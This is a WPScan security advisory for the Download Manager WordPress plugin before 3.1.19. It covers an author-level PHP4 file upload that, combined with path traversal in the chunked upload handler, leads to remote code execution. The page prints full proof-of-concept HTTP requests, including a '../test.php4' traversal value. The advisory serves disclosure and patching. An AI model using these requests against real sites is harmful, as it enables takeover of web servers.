logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Download Manager < 3.1.19 - Authenticated (author+) PHP4 File Upload to RCE

Description

The wpdm_admin_upload_file AJAX action used a blacklist approach to forbid potential dangerous files, such as PHP, from being uploaded. However, other dangerous extensions, like .php4 were not forbidden.

Proof of Concept

As an author (or any account with the upload_files capability), attach a .php4 file to a download (/wp-admin/post-new.php?post_type=wpdmpro)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------380248545020708884002749165315
Content-Length: 518
Connection: close
Cookie: [author+]

-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="_ajax_nonce"

922675e67c
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="action"

wpdm_admin_upload_file
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="package_file"; filename="test.php4"
Content-Type: text/php

<?php echo 'FAILED'; ?>

-----------------------------380248545020708884002749165315--


The file will be located at https://example.com/wp-content/uploads/download-manager-files/test.php4

Even though the plugin has an .htaccess to prevent access to files in /uploads/download-manager-files/, (which will only work on Apache web servers, leaving IIS and Nginx unprotected), the protection can be bypasssed via a path traversal vector to make the file go in another arbitrary folder when using the chunks handler

POST /wp-admin/admin-ajax.php?chunks=1 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------380248545020708884002749165315
Content-Length: 634
Connection: close
Cookie: [author+]

-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="name"

../test.php4
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="_ajax_nonce"

922675e67c
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="action"

wpdm_admin_upload_file
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="package_file"; filename="whatever"
Content-Type: text/php

<?php echo 'FAILED'; ?>

-----------------------------380248545020708884002749165315--


The file will be at https://example.com/wp-content/uploads/test.php4 and accessible to anyone

Affects Plugins

download-manager

Fixed in version 3.1.19

Classification

Type

UPLOAD

CWE

CWE-434

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

4ca9f811-3461-4dea-938f-1528440e2708

Timeline

Publicly Published

2021-04-30 (about 2 months ago)

Added

2021-04-30 (about 2 months ago)

Last Updated

2021-04-30 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin